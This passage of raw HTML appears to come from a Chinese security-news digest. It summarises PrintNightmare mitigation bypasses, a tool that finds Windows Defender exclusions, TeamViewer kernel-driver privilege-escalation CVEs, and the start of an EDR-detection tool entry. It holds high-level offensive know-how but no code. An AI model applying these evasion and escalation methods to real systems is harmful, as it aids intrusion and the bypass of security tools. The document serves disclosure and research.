padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">绕过限制，低权限用户也能安装漏洞驱动程序提升权限</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Mod0 Red Team 发现 PrintNightmare 漏洞绕过方法</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuHzEGRIjhkTQKWyFJGHNQKZohu3iaa3hCNvK10KVD7zbfAQe7aQRESVQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuHzEGRIjhkTQKWyFJGHNQKZohu3iaa3hCNvK10KVD7zbfAQe7aQRESVQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2858284812545121"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">PrintNightmare漏洞的安全限制可以被绕过：尽管有多种安全措施，但通过DNS欺骗等方法仍然可以攻击PnP配置。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">UNC Hardened Access不足以阻止攻击：虽然硬化UNC路径可以提供额外的安全性，但攻击者可以通过使用本地路径来绕过。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">RPC over named pipe的保护不可靠：即使重新启用了RPC over named pipes，攻击者仍然可以通过RPC over TCP fallback来进行攻击。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Print Driver exclusion list方法存在缺陷：这种方法实施起来复杂，且安全性不足，因为它基于一个“阻止列表”而非“允许列表”。</section></li></ul>
	<br/>
	<p>🏷️: PrintNightmare, 打印机, 安全漏洞, PnP, RPC</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x10
			 C#程序查找Windows Defender文件夹排除项</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">SharpExclusionFinder 是一个 C# 程序，用于通过 Windows Defender 的命令行工具检测文件夹排除项，支持递归扫描和多线程处理，并能将结果和错误信息记录到指定文件中。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=91855d7c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuygJK4lL9YrZEibH0j2SI1RB8zEyHa1Bshd9lrKtHlhgvmfiawsMmoemQ%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">使用MpCmdRun.exe检查文件夹是否被Windows Defender排除</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">C# 程序使用 Windows Defender 命令行工具查找排除文件夹</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuCuVtPyljNmfJPlIDvSCiadicI3C4SZVGxpfOsRVWjUabe7xHEEtcZvKQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuCuVtPyljNmfJPlIDvSCiadicI3C4SZVGxpfOsRVWjUabe7xHEEtcZvKQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2858284812514421"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">安全研究：SharpExclusionFinder 是为安全研究人员设计的，帮助他们发现系统中的 Windows Defender 排除项，这对于恶意软件分析和安全评估非常重要。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">递归扫描与多线程：程序支持递归扫描目录，可以设置扫描深度，并且利用多线程技术提高扫描效率。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">日志记录：程序能够将扫描结果和错误信息详细记录到用户指定的日志文件中，便于后续分析。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">无需管理员权限：该工具的设计允许在不需要管理员权限的情况下进行扫描，降低了使用门槛。</section></li></ul>
	<br/>
	<p>🏷️: C#, Windows Defender, 文件夹排除项, 多线程扫描</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x11
			 TeamViewer漏洞利用：非特权用户加载任意内核驱动</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">该网页揭示了TeamViewer中的两个漏洞（CVE-2024-7479和CVE-2024-7481），这些漏洞允许未授权用户将任意内核驱动程序加载到系统中，从而实现权限提升。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">TeamViewer 漏洞 CVE-2024-7479 &amp; CVE-2024-7481 可加载任意内核驱动</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">TeamViewer 漏洞 CVE-2024-7479 和 CVE-2024-7481 允许内核提权</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKueWiaFvmI5Op67Wcuk2td9kibd4lSOYRUxGMuYdTCrvo1yCv3fr3KaLHQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKueWiaFvmI5Op67Wcuk2td9kibd4lSOYRUxGMuYdTCrvo1yCv3fr3KaLHQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1525451584524152"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">TeamViewer的两个安全漏洞（CVE-2024-7479和CVE-2024-7481）允许未授权的权限提升。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">这些漏洞的存在是由于TeamViewer在处理客户端与SYSTEM服务之间的IPC通信时，未能验证驱动程序的真实性和签名。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">利用这些漏洞的方法包括BYOD技术，通过模拟TeamViewer客户端来加载有效签名的驱动程序，并执行提升权限的操作。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">TeamViewer的某些安全检查只在GUI层面有效，而通过IPC可以绕过这些检查。</section></li></ul>
	<br/>
	<p>🏷️: CVE, 漏洞利用, TeamViewer, 内核驱动, 安全披露</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x12
			 识别常见EDR进程和服务的工具Invoke-EDRChecker</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
